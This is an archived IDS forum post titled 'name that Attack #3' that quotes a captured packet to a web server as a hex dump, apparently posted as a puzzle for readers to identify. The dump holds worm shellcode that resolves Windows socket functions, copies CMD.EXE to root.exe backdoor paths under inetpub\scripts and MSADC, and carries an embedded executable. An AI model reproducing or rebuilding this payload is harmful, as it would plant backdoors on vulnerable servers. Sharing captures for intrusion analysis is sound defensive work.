Screaming Electron Forums

Go Back   Screaming Electron Forums > General Discussions > Security Forum > IDS Forum
Reload this Page name that Attack #3
FAQ Members List Calendar Search Today's Posts Mark Forums Read

 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #1  
Old April 29th, 2003
bsdjunkie's Avatar
bsdjunkie bsdjunkie is offline
Space Cowboy
  
Join Date: Aug 2002
Location: MI
Posts: 905
bsdjunkie will become famous soon enough
Default
> 04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80
> TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF
> ***A**** Seq: 0xD7D856CE Ack: 0xF3E3078 Win: 0x4470 TcpLen: 20
> 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C
> 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U
> F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat
> 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_
> 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E.
> E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u.
> FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy
> 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U..
> 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL
> 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc
> 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E....
> 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u
> BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct
> 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E
> A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u
> BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele
> 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E.....
> 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E..
> 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U..
> 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna
> 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E.....
> 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname..
> 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA
> 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u.
> FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3
> 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E.....
> 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx..
> 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i...
> 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4....
> C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t.
> C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................
> E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................
> E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ......
> FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................
> FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y..
> 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........
> 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t..
> 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U..
> BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD.
> 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj....
> 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..dinetpub\scr
> 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe...
> 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j..
> 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...dprogra~1\
> 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\
> 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe..
> 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U...
> 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP.........
> FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@...
> 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L
> 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%).........
> 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................
> 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ...
> 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@..............
> 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@...
> 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................
> 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ...............
> 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0...
> 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................
> 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`..
> 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... ....
> 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@.............
> 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............
> 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@.....
> FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
> FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
> FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h
> D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @..
> 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @..
> 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1
> 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j
> 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2...
> 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h
> 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@.......
> 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@..........h.$@.h
> 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h....
> E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L
> 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h
> B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5.
> 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j
> 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@...
> 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........
> 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.........h.$@.h.
> 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@
> 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@..
> C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff.
> 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217....
> 40 00 89 35 @..5
Reply With Quote
 

« Previous Thread | Next Thread »

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes
Threaded Mode Threaded Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT -4. The time now is 03:24.

Contact Us - Screaming Electron - Archive - Top

Powered by vBulletin® Version 3.7.1
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
This Page hosted by Network Synapse